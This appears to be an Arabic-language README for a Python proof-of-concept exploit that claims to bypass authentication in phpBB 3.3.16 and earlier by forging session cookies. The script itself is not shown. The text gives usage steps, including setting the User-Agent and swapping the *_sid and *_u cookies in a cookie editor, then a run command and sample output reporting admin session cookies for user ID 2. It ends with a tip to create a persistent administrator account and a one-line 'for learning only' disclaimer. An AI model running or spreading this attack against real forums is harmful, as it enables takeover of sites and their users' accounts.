
استغلال إثبات مفهوم بلغة Python يتجاوز المصادقة في phpBB 3.3.16 وما دون ذلك عبر تزوير ملفات تعريف ارتباط الجلسة للحصول على صلاحيات المسؤول.
تجاوز المصادقة
نص بسيط لتجاوز المصادقة، إذا كنت تريد الوصول عبر المتصفح لا تنسَ تغيير متغير USER_AGENT في السكربت وفقًا لما يظهر في متصفحك حتى يعمل. استخدم محرر الكوكيز لاستبدال قيمة *_sid و *_u
phpbb python3 exploit.py https://localhost:8000 joushk
[+] Target: https://localhost:8000
[+] Target username: joushk
[+] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Safari/537.36
[+] Session cookies obtained:
phpbb3_cl7ge_u: 2
phpbb3_cl7ge_k:
phpbb3_cl7ge_sid: 4823a1ffeea59187eb31be1809ec0fd3
[+] User ID: 2
[!] User ID is 2 – default admin account.
[!] EXPLOIT SUCCESSFUL!
[!] You now have admin access.
[!] Note: ACP may still ask for password if re-authentication is enabled.
[+] tips: new create user and add to administrator group using bypass account auth and login to ACP Successd
[!!!هذا السكربت لأغراض التعلم فقط]